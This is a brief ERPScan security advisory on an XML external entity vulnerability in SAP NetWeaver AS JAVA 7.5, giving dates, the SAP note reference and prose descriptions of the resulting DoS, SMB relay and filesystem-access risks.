Application: SAP NetWeaver AS JAVA
Versions Affected: SAP NetWeaver AS JAVA 7.5
Vendor URL: SAP
Vendor response: 10.03.2016
Date of Public Advisory: 08.08.2016
Reference: SAP Security Note 2296909
Author: Vahagn Vardanyan (ERPScan)
1) It allows an attacker to perform a DoS attack (for example, an XML Entity expansion attack)
2) An SMB Relay attack is a type of man-in-the-middle attack when an attacker asks a victim to authenticate into a machine controlled by the attacker, then relays the credentials to the target. The attackers forward the authentication information both ways, that provides them with access.
An attacker can use an XML external entity vulnerability to send specially crafted unauthorized XML requests which will be processed by XML parser. An attacker can use an XML external entity vulnerability to obtain unauthorized access to an OS filesystem.